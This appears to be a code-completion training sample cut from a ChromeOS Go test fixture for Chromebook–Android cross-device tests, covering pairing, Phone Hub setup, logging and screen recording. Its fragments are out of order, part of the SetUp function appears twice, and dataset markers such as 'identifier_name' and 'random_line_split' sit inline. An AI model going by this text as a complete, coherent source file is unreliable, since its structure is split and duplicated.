s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} else {
crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
}
if crosRecordErr != nil {
s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
}
}
if s.HasError() {
if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
s.Error("Failed to save Android bug report: ", err)
}
}
}
// Verify that pairing between Android and Chromebook is successful.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
if err := f.androidDevice.Pair(ctx); err != nil {
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
return errors.Wrap(err, "failed to reconnect to the snippet server")
}
if err := f.androidDevice.Pair(ctx); err != nil {
return errors.Wrap(err, "failed to connect the Android device to CrOS")
}
}
if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
}
return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a formatted JSON at the specified filepath.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, filepath string) error {
attributes := struct {
CrOS *crossdevicecommon.CrosAttributes
Android *AndroidAttributes
}{CrOS: crosAttrs, Android: androidAttrs}
crosLog, err := json.MarshalIndent(attributes, "", "\t")
if err != nil {
return errors.Wrap(err, "failed to format device metadata for logging")
}
if err := ioutil.WriteFile(filepath, crosLog, 0644); err != nil {
return errors.Wrap(err, "failed to write CrOS attributes to output file")
}
return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func | ConnectToWifi | identifier_name | |
fixture.go | with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
type crossdeviceFixture struct {
fOpt chrome.OptionsCallback // Function to generate Chrome Options
cr *chrome.Chrome
tconn *chrome.TestConn
kb *input.KeyboardEventWriter
androidDevice *AndroidDevice
androidAttributes *AndroidAttributes
crosAttributes *crossdevicecommon.CrosAttributes
btsnoopCmd *testexec.Cmd
logMarker *logsaver.Marker // Marker for per-test log.
allFeatures bool
saveAndroidScreenRecordingOnError func(context.Context, func() bool) error
saveScreenRecording bool
lockFixture bool
noSignIn bool
logcatStartTime adb.LogcatTimestamp
downloadsPath string
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
// Chrome is the running chrome instance.
Chrome *chrome.Chrome
// TestConn is a connection to the test extension.
TestConn *chrome.TestConn
// Connection to the lock screen test extension.
LoginConn *chrome.TestConn
// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
AndroidDevice *AndroidDevice
// The credentials to be used on both chromebook and phone.
Username string
Password string
// The options used to start Chrome sessions.
ChromeOptions []chrome.Option
}
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
// Android device from parent fixture.
androidDevice := s.ParentValue().(*FixtData).AndroidDevice
f.androidDevice = androidDevice
// Credentials to use (same as Android).
crosUsername := s.ParentValue().(*FixtData).Username
crosPassword := s.ParentValue().(*FixtData).Password
// Allocate time for logging and saving a screenshot and bugreport in case of failure.
cleanupCtx := ctx
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
defer cancel()
// Save logcat so we have Android logs even if fixture setup fails.
startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
// Set default chrome options.
opts, err := f.fOpt(ctx, s)
if err != nil {
s.Fatal("Failed to obtain Chrome options: ", err)
}
tags := []string{
"*nearby*=3",
"*cryptauth*=3",
"*device_sync*=3",
"*multidevice*=3",
"*secure_channel*=3",
"*phonehub*=3",
"*blue*=3",
"ble_*=3",
}
opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
customUser, userOk := s.Var(customCrOSUsername)
customPass, passOk := s.Var(customCrOSPassword)
if userOk && passOk {
s.Log("Logging in with user-provided credentials")
crosUsername = customUser
crosPassword = customPass
} else {
s.Log("Logging in with default GAIA credentials")
}
if f.noSignIn {
opts = append(opts, chrome.DontSkipOOBEAfterLogin())
} else {
opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
}
if val, ok := s.Var(KeepStateVar); ok {
b, err := strconv.ParseBool(val)
if err != nil {
s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
}
if b {
opts = append(opts, chrome.KeepState())
}
}
cr, err := chrome.New(
ctx,
opts...,
)
if err != nil {
s.Fatal("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
} | random_line_split |